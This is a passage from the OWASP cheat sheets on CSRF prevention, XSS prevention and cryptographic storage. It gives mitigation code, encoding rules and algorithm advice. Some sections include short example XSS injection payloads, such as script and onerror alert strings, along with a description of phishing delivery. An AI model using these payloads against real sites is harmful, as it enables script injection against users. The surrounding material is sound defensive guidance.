Attack: For exploitation, attackers can share the malicious URL with the victim (e.g., via spear-phishing emails) and convince them to click on it, because such a URL belongs to the origin of an honest, reputable, but vulnerable website. Alternatively, they can use it as a part of an attack page they control and abuse browser APIs (e.g., the window.open() API) to trick the vulnerable JavaScript of the target page into sending the HTTP request, which closely resembles the attack model of the classical CSRF attacks.

For more examples of client-side CSRF, see this post by the Facebook Whitehat program and this USENIX Security paper.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf-mitigation-techniques","title":"Client-side CSRF Mitigation Techniques","text":"

Independent Requests: Client-side CSRF can be prevented if asynchronous requests are not generated via attacker controllable inputs, such as the URL, window name, document referrer, and postMessages, to name only a few examples.

Input Validation: Achieving complete isolation between inputs and request parameters may not always be possible, depending on the context and functionality. In these cases, input validation checks have to be implemented. These checks should strictly assess the format and choice of the values of the request parameters and decide whether they can only be used in non-state-changing operations (e.g., only allow GET requests and endpoints starting with a predefined prefix).
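
For illustration, the following sketch (the /public/widgets/ prefix and the isSafeRequest helper are hypothetical, not part of the vulnerable example above) only issues the request when the fragment selects a GET request to an allowed endpoint prefix:

function isSafeRequest(request_method, request_endpoint){\n// only allow non-state-changing GET requests\nif(request_method.toLowerCase() !== 'get'){ return false; }\n// only allow endpoints under a predefined, same-origin prefix\nreturn request_endpoint.startsWith('/public/widgets/');\n}\n\nlet params = window.location.hash.slice(1).match(/^(get|post);(.*)$/);\nif(params && isSafeRequest(params[1], params[2])){\nfetch(params[2], { method: 'GET' }).then(response => { /* [...] */ });\n}\n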

Predefined Request Data: Another mitigation technique is to store a list of predefined, safe request data in the JavaScript code (e.g., combinations of endpoints, request methods and other parameters that are safe to be replayed). The program can then use a switch parameter in the URL fragment to decide which entry of the list each JavaScript function should use.
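
A minimal sketch of this approach (the entries and the fragment keys below are illustrative placeholders):

// predefined, safe request data; the URL fragment only selects an entry by key\nvar SAFE_REQUESTS = {\n'profile': { method: 'GET', endpoint: '/profile' },\n'inbox': { method: 'GET', endpoint: '/inbox' }\n};\n\nfunction ajaxLoad(){\nlet key = window.location.hash.slice(1); // e.g., https://site.com/index/#profile\nlet entry = SAFE_REQUESTS[key];\nif(entry){\nfetch(entry.endpoint, { method: entry.method }).then(response => { /* [...] */ });\n}\n}\nwindow.onload = ajaxLoad;\n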

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#java-reference-example","title":"Java Reference Example","text":"

The following JEE web filter provides an example reference for some of the concepts described in this cheatsheet. It implements the following stateless mitigations (OWASP CSRFGuard covers a stateful approach).

Please note that it only acts as a reference sample and is not complete (for example: it doesn't have a block to direct the control flow when the origin and referrer header check succeeds, nor does it have port/host/protocol-level validation for the referrer header). Developers are recommended to build their complete mitigation on top of this reference sample. Developers should also implement authentication and authorization mechanisms before the CSRF check can be considered effective.

Full source is located here and provides a runnable POC.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#javascript-guidance-for-auto-inclusion-of-csrf-tokens-as-an-ajax-request-header","title":"JavaScript Guidance for Auto-inclusion of CSRF tokens as an AJAX Request header","text":"

The following guidance considers the GET, HEAD, and OPTIONS methods to be safe operations. Therefore GET, HEAD, and OPTIONS method AJAX calls need not be appended with a CSRF token header. However, if these verbs are used to perform state-changing operations, they will also require a CSRF token header (although this is bad practice, and should be avoided).

The POST, PUT, PATCH, and DELETE methods, being state changing verbs, should have a CSRF token attached to the request. The following guidance will demonstrate how to create overrides in JavaScript libraries to have CSRF tokens included automatically with every AJAX request for the state changing methods mentioned above.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#storing-the-csrf-token-value-in-the-dom","title":"Storing the CSRF Token Value in the DOM","text":"

A CSRF token can be included in the <meta> tag as shown below. All subsequent calls in the page can extract the CSRF token from this <meta> tag. It can also be stored in a JavaScript variable or anywhere on the DOM. However, it is not recommended to store it in cookies or browser local storage.

The following code snippet can be used to include a CSRF token as a <meta> tag:

<meta name=\"csrf-token\" content=\"{{ csrf_token() }}\">\n

The exact syntax of populating the content attribute would depend on your web application's backend programming language.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#overriding-defaults-to-set-custom-header","title":"Overriding Defaults to Set Custom Header","text":"

Several JavaScript libraries allow for overriding default settings to have a header added automatically to all AJAX requests.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#xmlhttprequest-native-javascript","title":"XMLHttpRequest (Native JavaScript)","text":"

XMLHttpRequest's open() method can be overridden to set the anti-csrf-token header whenever the open() method is invoked. The function csrfSafeMethod() defined below will filter out the safe HTTP methods and only add the header to unsafe HTTP methods.

This can be done as demonstrated in the following code snippet:

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\nfunction csrfSafeMethod(method) {\n// these HTTP methods do not require CSRF protection\nreturn (/^(GET|HEAD|OPTIONS)$/.test(method));\n}\nvar o = XMLHttpRequest.prototype.open;\nXMLHttpRequest.prototype.open = function(){\nvar res = o.apply(this, arguments);\nvar err = new Error();\nif (!csrfSafeMethod(arguments[0])) {\nthis.setRequestHeader('anti-csrf-token', csrf_token);\n}\nreturn res;\n};\n</script>\n
"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#angularjs","title":"AngularJS","text":"

AngularJS allows for setting default headers for HTTP operations. Further documentation can be found at AngularJS's documentation for $httpProvider.

<script>\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\n\nvar app = angular.module(\"app\", []);\n\napp.config(['$httpProvider', function ($httpProvider) {\n$httpProvider.defaults.headers.post[\"anti-csrf-token\"] = csrf_token;\n$httpProvider.defaults.headers.put[\"anti-csrf-token\"] = csrf_token;\n$httpProvider.defaults.headers.patch[\"anti-csrf-token\"] = csrf_token;\n// AngularJS does not create an object for DELETE and TRACE methods by default, and has to be manually created.\n$httpProvider.defaults.headers.delete = {\n\"Content-Type\" : \"application/json;charset=utf-8\",\n\"anti-csrf-token\" : csrf_token\n};\n$httpProvider.defaults.headers.trace = {\n\"Content-Type\" : \"application/json;charset=utf-8\",\n\"anti-csrf-token\" : csrf_token\n};\n}]);\n</script>\n

This code snippet has been tested with AngularJS version 1.7.7.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#axios","title":"Axios","text":"

Axios allows us to set default headers for the POST, PUT, DELETE and PATCH actions.

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\n\naxios.defaults.headers.post['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.put['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.delete['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.patch['anti-csrf-token'] = csrf_token;\n\n// Axios does not create an object for TRACE method by default, and has to be created manually.\naxios.defaults.headers.trace = {}\naxios.defaults.headers.trace['anti-csrf-token'] = csrf_token\n</script>\n

This code snippet has been tested with Axios version 0.18.0.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#jquery","title":"JQuery","text":"

JQuery exposes an API called $.ajaxSetup() which can be used to add the anti-csrf-token header to the AJAX request. API documentation for $.ajaxSetup() can be found here. The function csrfSafeMethod() defined below will filter out the safe HTTP methods and only add the header to unsafe HTTP methods.

You can configure jQuery to automatically add the token to all request headers by adopting the following code snippet. This provides a simple and convenient CSRF protection for your AJAX based applications:

<script type=\"text/javascript\">\nvar csrf_token = $('meta[name=\"csrf-token\"]').attr('content');\n\nfunction csrfSafeMethod(method) {\n// these HTTP methods do not require CSRF protection\nreturn (/^(GET|HEAD|OPTIONS)$/.test(method));\n}\n\n$.ajaxSetup({\nbeforeSend: function(xhr, settings) {\nif (!csrfSafeMethod(settings.type) && !this.crossDomain) {\nxhr.setRequestHeader(\"anti-csrf-token\", csrf_token);\n}\n}\n});\n</script>\n

This code snippet has been tested with jQuery version 3.3.1.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#csrf","title":"CSRF","text":""},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","title":"Cross Site Scripting Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance to prevent XSS vulnerabilities.

Cross-Site Scripting (XSS) is a misnomer. The name originated from early versions of the attack where stealing data cross-site was the primary focus. Since then, it has extended to include injection of basically any content, but we still refer to this as XSS. XSS is serious and can lead to account impersonation, observing user behaviour, loading external content, stealing sensitive data, and more.

This cheatsheet is a list of techniques to prevent or limit the impact of XSS. No single technique will solve XSS. Using the right combination of defensive techniques is necessary to prevent XSS.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#framework-security","title":"Framework Security","text":"

Fewer XSS bugs appear in applications built with modern web frameworks. These frameworks steer developers towards good security practices and help mitigate XSS by using templating, auto-escaping, and more. That said, developers need to be aware of problems that can occur when using frameworks insecurely such as:

Understand how your framework prevents XSS and where it has gaps. There will be times when you need to do something outside the protection provided by your framework. This is where Output Encoding and HTML Sanitization are critical. OWASP is producing framework specific cheatsheets for React, Vue, and Angular.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-defense-philosophy","title":"XSS Defense Philosophy","text":"

For XSS attacks to be successful, an attacker needs to insert and execute malicious content in a webpage. Each variable in a web application needs to be protected. Ensuring that all variables go through validation and are then escaped or sanitized is known as perfect injection resistance. Any variable that does not go through this process is a potential weakness. Frameworks make it easy to ensure variables are correctly validated and escaped or sanitised.

However, frameworks aren't perfect and security gaps still exist in popular frameworks like React and Angular. Output Encoding and HTML Sanitization help address those gaps.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding","title":"Output Encoding","text":"

Output Encoding is recommended when you need to safely display data exactly as a user typed it in. Variables should be interpreted as text, not as code. This section covers each form of output encoding, where to use it, and where to avoid using dynamic variables entirely.

Start with using your framework\u2019s default output encoding protection when you wish to display data as the user typed it in. Automatic encoding and escaping functions are built into most frameworks.

If you\u2019re not using a framework or need to cover gaps in the framework then you should use an output encoding library. Each variable used in the user interface should be passed through an output encoding function. A list of output encoding libraries is included in the appendix.
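
As an illustration only, the sketch below uses the node-esapi encoder (which appears elsewhere in this series); the untrustedData value and the output element are hypothetical:

var ESAPI = require('node-esapi');\n// hypothetical untrusted value; in practice this comes from a request, database, etc.\nvar untrustedData = 'Johnson & <img src=x onerror=alert(1)>';\n// pass the variable through the output encoder for the context it is rendered in\nvar safeForHtmlBody = ESAPI.encoder().encodeForHTML(untrustedData);\nvar element = document.getElementById('output'); // hypothetical target element\n// the encoded value renders as text and can no longer introduce new markup\nelement.innerHTML = '<span>' + safeForHtmlBody + '</span>';\n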

There are many different output encoding methods because browsers parse HTML, JS, URLs, and CSS differently. Using the wrong encoding method may introduce weaknesses or harm the functionality of your application.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-html-contexts","title":"Output Encoding for \u201cHTML Contexts\u201d","text":"

\u201cHTML Context\u201d refers to inserting a variable between two basic HTML tags like a <div> or <b>. For example:

<div> $varUnsafe </div>\n

An attacker could modify data that is rendered as $varUnsafe. This could lead to an attack being added to a webpage. For example:

<div> <script>alert`1`</script> </div> // Example Attack\n

In order to add a variable to an HTML context safely, use HTML entity encoding for that variable as you add it to a web template.

Here are some examples of encoded values for specific characters.

If you're using JavaScript for writing to HTML, look at the .textContent attribute as it is a Safe Sink and will automatically HTML Entity Encode.

&    &amp;\n<    &lt;\n>    &gt;\n\"    &quot;\n'    &#x27;\n
"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-html-attribute-contexts","title":"Output Encoding for \u201cHTML Attribute Contexts\u201d","text":"

\u201cHTML Attribute Contexts\u201d refer to placing a variable in an HTML attribute value. You may want to do this to change a hyperlink, hide an element, add alt-text for an image, or change inline CSS styles. You should apply HTML attribute encoding to variables being placed in most HTML attributes. A list of safe HTML attributes is provided in the Safe Sinks section.

<div attr=\"$varUnsafe\">\n<div attr=\u201d*x\u201d onblur=\u201dalert(1)*\u201d> // Example Attack\n

It\u2019s critical to use quotation marks like \" or ' to surround your variables. Quoting makes it difficult to change the context a variable operates in, which helps prevent XSS. Quoting also significantly reduces the character set that you need to encode, making your application more reliable and the encoding easier to implement.

If you're using JavaScript for writing to an HTML attribute, look at the .setAttribute and [attribute] methods, which will automatically HTML Attribute Encode. Those are Safe Sinks as long as the attribute name is hardcoded and innocuous, like id or class. Generally, attributes that accept JavaScript, such as onClick, are NOT safe to use with untrusted attribute values.
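
A brief sketch of that distinction (the element and the untrusted value are hypothetical):

var untrustedValue = '\" onmouseover=\"alert(1)'; // hypothetical attacker-influenced input\nvar link = document.getElementById('profile-link'); // hypothetical element\n// Safe: hardcoded, innocuous attribute names; the value is treated as data\nlink.setAttribute('title', untrustedValue);\nlink.className = untrustedValue;\n// NOT safe: the attribute accepts JavaScript, so the value would be treated as code\n// link.setAttribute('onclick', untrustedValue);\n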

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-javascript-contexts","title":"Output Encoding for \u201cJavaScript Contexts\u201d","text":"

\u201cJavaScript Contexts\u201d refer to placing variables into inline JavaScript which is then embedded in an HTML document. This is commonly seen in programs that heavily use custom JavaScript embedded in their web pages.

The only \u2018safe\u2019 location for placing variables in JavaScript is inside a \u201cquoted data value\u201d. All other contexts are unsafe and you should not place variable data in them.

Examples of \u201cQuoted Data Values\u201d

<script>alert('$varUnsafe')</script>\n<script>x='$varUnsafe'</script>\n<div onmouseover=\"'$varUnsafe'\"></div>\n

Encode all characters using the \xHH format. Encoding libraries often have an EncodeForJavaScript function or similar to support this.

Please look at the OWASP Java Encoder JavaScript encoding examples for examples of proper JavaScript use that requires minimal encoding.
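
As a sketch only, using the node-esapi encoder referenced elsewhere in this series (the untrustedData value and the template placeholder are hypothetical):

var ESAPI = require('node-esapi');\nvar untrustedData = \"'; alert(1); //\"; // hypothetical untrusted value\n// encode for the JavaScript context before placing the value inside a quoted string in a template\nvar safeForJs = ESAPI.encoder().encodeForJavascript(untrustedData);\n// rendered output, e.g. <script>var greeting = '<%= safeForJs %>';</script>\n// quote and terminator characters are emitted in escaped form and cannot break out of the string\n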

For JSON, verify that the Content-Type header is application/json and not text/html to prevent XSS.
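
For instance, a minimal Node.js handler (a sketch, not tied to any particular framework) sets the header explicitly:

const http = require('http');\nhttp.createServer((req, res) => {\nconst payload = { query: req.url }; // example data echoed back to the client\n// serving JSON as text/html would let the browser interpret injected markup as HTML\nres.writeHead(200, { 'Content-Type': 'application/json' });\nres.end(JSON.stringify(payload));\n}).listen(3000);\n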

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-css-contexts","title":"Output Encoding for \u201cCSS Contexts\u201d","text":"

\u201cCSS Contexts\u201d refer to variables placed into inline CSS. This is common when you want users to be able to customize the look and feel of their webpages. CSS is surprisingly powerful and has been used for many types of attacks. Variables should only be placed in a CSS property value. Other \u201cCSS Contexts\u201d are unsafe and you should not place variable data in them.

<style> selector { property : $varUnsafe; } </style>\n<style> selector { property : \"$varUnsafe\"; } </style>\n<span style=\"property : $varUnsafe\">Oh no</span>\n

If you're using JavaScript to change a CSS property, look into using style.property = x. This is a Safe Sink and will automatically CSS encode data in it.

// Add CSS Encoding Advice

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-url-contexts","title":"Output Encoding for \u201cURL Contexts\u201d","text":"

\u201cURL Contexts\u201d refer to variables placed into a URL. Most commonly, a developer will add a parameter or URL fragment to a URL base that is then displayed or used in some operation. Use URL Encoding for these scenarios.

<a href=\"http://www.owasp.org?test=$varUnsafe\">link</a >\n

Encode all characters with the %HH encoding format. Make sure any attributes are fully quoted, same as JS and CSS.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#common-mistake","title":"Common Mistake","text":"

There will be situations where you use a URL in different contexts. The most common one would be adding it to an href or src attribute of an <a> tag. In these scenarios, you should do URL encoding, followed by HTML attribute encoding.

url = \"https://site.com?data=\" + urlencode(parameter)\n<a href='attributeEncode(url)'>link</a>\n

If you're using JavaScript to construct a URL Query Value, look into using window.encodeURIComponent(x). This is a Safe Sink and will automatically URL encode data in it.
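
A short sketch of both steps in the browser (the element and parameter are hypothetical); the scheme and host are hardcoded, so only the query value is attacker-influenced:

var parameter = 'a&b=c#d'; // hypothetical untrusted query value\n// URL-encode the value before concatenating it into the query string\nvar url = 'https://site.com?data=' + window.encodeURIComponent(parameter);\nvar link = document.getElementById('result-link'); // hypothetical element\n// assigning through the DOM property avoids a separate HTML attribute encoding step\nlink.href = url;\n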

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#dangerous-contexts","title":"Dangerous Contexts","text":"

Output encoding is not perfect. It will not always prevent XSS. These locations are known as dangerous contexts. Dangerous contexts include:

<script>Directly in a script</script>\n<!-- Inside an HTML comment -->\n<style>Directly in CSS</style>\n<div ToDefineAnAttribute=test />\n<ToDefineATag href=\"/test\" />\n

Other areas to be careful of include:

Don't place variables into dangerous contexts; even with output encoding, an XSS attack cannot be fully prevented there.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#html-sanitization","title":"HTML Sanitization","text":"

Sometimes users need to author HTML. One scenario would be allowing users to change the styling or structure of content inside a WYSIWYG editor. Output encoding here will prevent XSS, but it will break the intended functionality of the application. The styling will not be rendered. In these cases, HTML Sanitization should be used.

HTML Sanitization will strip dangerous HTML from a variable and return a safe string of HTML. OWASP recommends DOMPurify for HTML Sanitization.

let clean = DOMPurify.sanitize(dirty);\n

There are some further things to consider:

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#safe-sinks","title":"Safe Sinks","text":"

Security professionals often talk in terms of sources and sinks. If you pollute a river, it'll flow downstream somewhere. It\u2019s the same with computer security. XSS sinks are places where variables are placed into your webpage.

Thankfully, many sinks where variables can be placed are safe. This is because these sinks treat the variable as text and will never execute it. Try to refactor your code to remove references to unsafe sinks like innerHTML, and instead use textContent or value.

elem.textContent = dangerVariable;\nelem.insertAdjacentText(dangerVariable);\nelem.className = dangerVariable;\nelem.setAttribute(safeName, dangerVariable);\nformfield.value = dangerVariable;\ndocument.createTextNode(dangerVariable);\ndocument.createElement(dangerVariable);\nelem.innerHTML = DOMPurify.sanitize(dangerVar);\n

Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width.

For a comprehensive list, check out the DOMPurify allowlist

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#other-controls","title":"Other Controls","text":"

Framework Security Protections, Output Encoding, and HTML Sanitization will provide the best protection for your application. OWASP recommends these in all circumstances.

Consider adopting the following controls in addition to the above.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-prevention-rules-summary","title":"XSS Prevention Rules Summary","text":"

The following snippets of HTML demonstrate how to safely render untrusted data in a variety of different contexts.

Data Type Context Code Sample Defense String HTML Body <span>UNTRUSTED DATA </span> HTML Entity Encoding (rule #1). String Safe HTML Attributes <input type=\"text\" name=\"fname\" value=\"UNTRUSTED DATA \"> Aggressive HTML Entity Encoding (rule #2), Only place untrusted data into a list of safe attributes (listed below), Strictly validate unsafe attributes such as background, ID and name. String GET Parameter <a href=\"/site/search?value=UNTRUSTED DATA \">clickme</a> URL Encoding (rule #5). String Untrusted URL in a SRC or HREF attribute <a href=\"UNTRUSTED URL \">clickme</a> <iframe src=\"UNTRUSTED URL \" /> Canonicalize input, URL Validation, Safe URL verification, Allow-list http and HTTPS URLs only (Avoid the JavaScript Protocol to Open a new Window), Attribute encoder. String CSS Value HTML <div style=\"width: UNTRUSTED DATA ;\">Selection</div> Strict structural validation (rule #4), CSS Hex encoding, Good design of CSS Features. String JavaScript Variable <script>var currentValue='UNTRUSTED DATA ';</script> <script>someFunction('UNTRUSTED DATA ');</script> Ensure JavaScript variables are quoted, JavaScript Hex Encoding, JavaScript Unicode Encoding, Avoid backslash encoding (\\\" or \\' or \\\\). HTML HTML Body <div>UNTRUSTED HTML</div> HTML Validation (JSoup, AntiSamy, HTML Sanitizer...). String DOM XSS <script>document.write(\"UNTRUSTED INPUT: \" + document.location.hash );<script/> DOM based XSS Prevention Cheat Sheet"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-rules-summary","title":"Output Encoding Rules Summary","text":"

The purpose of output encoding (as it relates to Cross Site Scripting) is to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. The following chart details a list of critical output encoding methods needed to stop Cross Site Scripting.

Encoding Type Encoding Mechanism HTML Entity Encoding Convert & to &amp;, Convert < to &lt;, Convert > to &gt;, Convert \" to &quot;, Convert ' to &#x27; HTML Attribute Encoding Except for alphanumeric characters, encode all characters with the HTML Entity &#xHH; format, including spaces. (HH = Hex Value) URL Encoding Standard percent encoding, see here. URL encoding should only be used to encode parameter values, not the entire URL or path fragments of a URL. JavaScript Encoding Except for alphanumeric characters, encode all characters with the \\uXXXX unicode encoding format (X = Integer). CSS Hex Encoding CSS encoding supports \\XX and \\XXXXXX. Using a two character encode can cause problems if the next character continues the encode sequence. There are two solutions: (a) Add a space after the CSS encode (will be ignored by the CSS parser) (b) use the full amount of CSS encoding possible by zero padding the value."},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":"

XSS Attack Cheat Sheet:

The following article describes how to exploit different kinds of XSS Vulnerabilities that this article was created to help you avoid:

Description of XSS Vulnerabilities:

Discussion on the Types of XSS Vulnerabilities:

How to Review Code for Cross-site scripting Vulnerabilities:

How to Test for Cross-site scripting Vulnerabilities:

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html","title":"Cryptographic Storage Cheat Sheet","text":""},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article provides a simple model to follow when implementing solutions to protect data at rest.

Passwords should not be stored using reversible encryption - secure password hashing algorithms should be used instead. The Password Storage Cheat Sheet contains further guidance on storing passwords.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#architectural-design","title":"Architectural Design","text":"

The first step in designing any application is to consider the overall architecture of the system, as this will have a huge impact on the technical implementation.

This process should begin with considering the threat model of the application (i.e., who you are trying to protect the data against).

The use of dedicated secret or key management systems can provide an additional layer of security protection, as well as making the management of secrets significantly easier. However, this comes at the cost of additional complexity and administrative overhead, so it may not be feasible for all applications. Note that many cloud environments provide these services, so they should be taken advantage of where possible. The Secrets Management Cheat Sheet contains further guidance on this topic.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#where-to-perform-encryption","title":"Where to Perform Encryption","text":"

Encryption can be performed on a number of levels in the application stack, such as:

Which layer(s) are most appropriate will depend on the threat model. For example, hardware level encryption is effective at protecting against the physical theft of the server, but will provide no protection if an attacker is able to compromise the server remotely.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#minimise-the-storage-of-sensitive-information","title":"Minimise the Storage of Sensitive Information","text":"

The best way to protect sensitive information is to not store it in the first place. Although this applies to all kinds of information, it is most often applicable to credit card details, as they are highly desirable for attackers, and PCI DSS has such stringent requirements for how they must be stored. Wherever possible, the storage of sensitive information should be avoided.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms","title":"Algorithms","text":"

For symmetric encryption, AES with a key that's at least 128 bits (ideally 256 bits) and a secure mode should be used as the preferred algorithm.

For asymmetric encryption, use elliptic curve cryptography (ECC) with a secure curve such as Curve25519 as a preferred algorithm. If ECC is not available and RSA must be used, then ensure that the key is at least 2048 bits.

Many other symmetric and asymmetric algorithms are available which have their own pros and cons, and they may be better or worse than AES or Curve25519 in specific use cases. When considering these, a number of factors should be taken into account, including:

In some cases there may be regulatory requirements that limit the algorithms that can be used, such as FIPS 140-2 or PCI DSS.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms","title":"Custom Algorithms","text":"

Don't do this.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#cipher-modes","title":"Cipher Modes","text":"

There are various modes that can be used to allow block ciphers (such as AES) to encrypt arbitrary amounts of data, in the same way that a stream cipher would. These modes have different security and performance characteristics, and a full discussion of them is outside the scope of this cheat sheet. Some of the modes have requirements to generate secure initialisation vectors (IVs) and other attributes, but these should be handled automatically by the library.

Where available, authenticated modes should always be used. These provide guarantees of the integrity and authenticity of the data, as well as confidentiality. The most commonly used authenticated modes are GCM and CCM, which should be used as a first preference.
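
As a rough illustration only (not a prescribed implementation), authenticated encryption with AES-256-GCM in Node.js might look like the sketch below; key handling is deliberately simplified:

const crypto = require('crypto');\n\nconst key = crypto.randomBytes(32); // 256-bit key; in practice, obtain it from a key management system\n\nfunction encrypt(plaintext) {\nconst iv = crypto.randomBytes(12); // 96-bit IV, must be unique per encryption\nconst cipher = crypto.createCipheriv('aes-256-gcm', key, iv);\nconst ciphertext = Buffer.concat([cipher.update(plaintext, 'utf8'), cipher.final()]);\nreturn { iv, ciphertext, tag: cipher.getAuthTag() }; // store the IV and auth tag alongside the ciphertext\n}\n\nfunction decrypt({ iv, ciphertext, tag }) {\nconst decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);\ndecipher.setAuthTag(tag); // the integrity/authenticity check happens in final()\nreturn Buffer.concat([decipher.update(ciphertext), decipher.final()]).toString('utf8');\n}\n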

If GCM or CCM are not available, then CTR mode or CBC mode should be used. As these do not provide any guarantees about the authenticity of the data, separate authentication should be implemented, such as using the Encrypt-then-MAC technique. Care needs to be taken when using this method with variable-length messages.

ECB should not be used outside of very specific circumstances.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#random-padding","title":"Random Padding","text":"

For RSA, it is essential to enable Random Padding. Random Padding is also known as OAEP or Optimal Asymmetric Encryption Padding. This class of defense protects against Known Plain Text Attacks by adding randomness at the beginning of the payload.

The padding scheme from PKCS#1 is typically used in this case.
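
For example, a minimal Node.js sketch (the key pair is generated inline only for brevity; in practice keys would come from a key management process):

const crypto = require('crypto');\nconst { publicKey, privateKey } = crypto.generateKeyPairSync('rsa', { modulusLength: 2048 });\n\nconst ciphertext = crypto.publicEncrypt({\nkey: publicKey,\npadding: crypto.constants.RSA_PKCS1_OAEP_PADDING, // OAEP random padding\noaepHash: 'sha256'\n}, Buffer.from('sensitive data'));\n\nconst plaintext = crypto.privateDecrypt({\nkey: privateKey,\npadding: crypto.constants.RSA_PKCS1_OAEP_PADDING,\noaepHash: 'sha256'\n}, ciphertext);\n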

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation","title":"Secure Random Number Generation","text":"

Random numbers (or strings) are needed for various security critical functionality, such as generating encryption keys, IVs, session IDs, CSRF tokens or password reset tokens. As such, it is important that these are generated securely, and that it is not possible for an attacker to guess and predict them.

It is generally not possible for computers to generate truly random numbers (without special hardware), so most systems and languages provide two different types of randomness.

Pseudo-Random Number Generators (PRNGs) provide low-quality randomness but are much faster, and can be used for non-security related functionality (such as ordering results on a page, or randomising UI elements). However, they must not be used for anything security critical, as it is often possible for attackers to guess or predict the output.

Cryptographically Secure Pseudo-Random Number Generators (CSPRNGs) are designed to produce a much higher quality of randomness (more strictly, a greater amount of entropy), making them safe to use for security-sensitive functionality. However, they are slower and more CPU-intensive, and can end up blocking in some circumstances when large amounts of random data are requested. As such, if large amounts of non-security related randomness are needed, they may not be appropriate.
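
To make the distinction concrete in Node.js (a sketch; the sizes and ranges are arbitrary):

const crypto = require('crypto');\n// Insecure PRNG: acceptable for shuffling UI elements, never for secrets\nconst shuffleSeed = Math.random();\n// CSPRNG: suitable for keys, tokens and other security-critical values\nconst sessionToken = crypto.randomBytes(32).toString('hex'); // 256 bits of entropy\nconst otpDigit = crypto.randomInt(0, 10); // unbiased integer in [0, 10)\n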

The table below shows the recommended algorithms for each language, as well as insecure functions that should not be used.

Language Unsafe Functions Cryptographically Secure Functions C random(), rand() getrandom(2) Java java.util.Random() java.security.SecureRandom PHP rand(), mt_rand(), array_rand(), uniqid() random_bytes(), random_int() in PHP 7 or openssl_random_pseudo_bytes() in PHP 5 .NET/C# Random() RandomNumberGenerator Objective-C arc4random() (Uses RC4 Cipher) SecRandomCopyBytes Python random() secrets() Ruby Random SecureRandom Go rand using math/rand package crypto.rand package Rust rand::prng::XorShiftRng rand::prng::chacha::ChaChaRng and the rest of the Rust library CSPRNGs. Node.js Math.random() crypto.randomBytes, crypto.randomInt, crypto.randomUUID"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#uuids-and-guids","title":"UUIDs and GUIDs","text":"

Universally unique identifiers (UUIDs or GUIDs) are sometimes used as a quick way to generate random strings. Although they can provide a reasonable source of randomness, this will depend on the type or version of the UUID that is created.

